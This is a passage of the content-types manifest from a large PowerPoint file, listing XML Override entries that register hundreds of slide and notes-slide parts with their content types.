  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide774.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide473.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537.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide693.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide464.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide650.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide643.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide686.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide279.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide545.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide731.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80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622.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide618.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide716.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide703.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide75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787.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795.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide15.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630.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide292.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00.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide551.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide122.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide767.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide221.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide472.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide724.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide517.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide688.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide136.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide359.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide617.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide766.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide723.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide544.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide587.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide730.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide438.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide802.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651.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide21.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide694.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide623.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide365.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide717.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide79.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322.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide794.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide6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62.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide788.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide176.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide702.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide435.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide621.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide709.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19.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide773.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide234.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide547.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide331.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide692.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide490.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide765.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide676.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide377.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide660.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide748.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide404.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide144.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide750.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide475.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide52.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637.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide5.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide605.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide733.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604.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide779.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide84.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide345.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide620.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide507.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide531.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564.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide691.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289.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide217.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide708.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide436.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide578.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide675.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide27.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide235.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide28.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide546.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide12.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide474.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide732.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide563.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579.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636.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide619.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide747.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide403.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764.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778.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide549.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide735.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide506.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide690.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577.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707.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662.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791.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide97.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide189.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide375.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607.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide562.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide131.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide720.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide763.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678.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide304.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide635.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide590.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576.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide762.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide68.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide205.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661.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide233.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide548.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406.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide790.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide2.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide749.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634.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide405.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide561.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide706.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677.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06.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide777.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide73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649.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598.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide687.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide784.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide519.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide705.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide695.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide792.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide608.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616.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide276.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide713.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide551.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide66.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide768.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632.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60.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide624.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349.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72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776.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide759.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641.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide310.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide543.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide366.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide597.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide783.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide694.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide767.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide528.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide793.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide617.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide706.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide803.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730.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633.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49.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide688.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12.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461.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide55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269.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide544.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide640.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide365.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide802.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561.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide623.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide348.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide286.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide777.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide115.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide618.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide626.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide553.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide367.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide588.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide774.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide545.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide731.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide669.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide359.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689.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596.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide375.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711.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630.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide69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782.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide703.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57.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589.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide775.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide546.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide732.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39.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide668.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide625.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide130.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide368.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide595.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide769.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide374.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631.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide203.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552.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52.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71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781.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide704.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide480.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide58.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide696.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619.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide92.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide121.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93.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide652.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide377.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide563.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide474.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide660.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide578.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide709.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide71.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide233.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide594.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136.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide547.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide675.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide725.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507.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide605.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667.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide323.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide748.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide63.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide404.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide780.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide434.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide765.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide451.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide733.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide31.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide795.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide176.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide539.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide651.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide465.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide376.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide724.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide538.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide562.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide449.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide475.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide661.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide77.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide749.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137.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide548.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide361.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide250.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide676.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide248.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide739.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide392.xml"/>
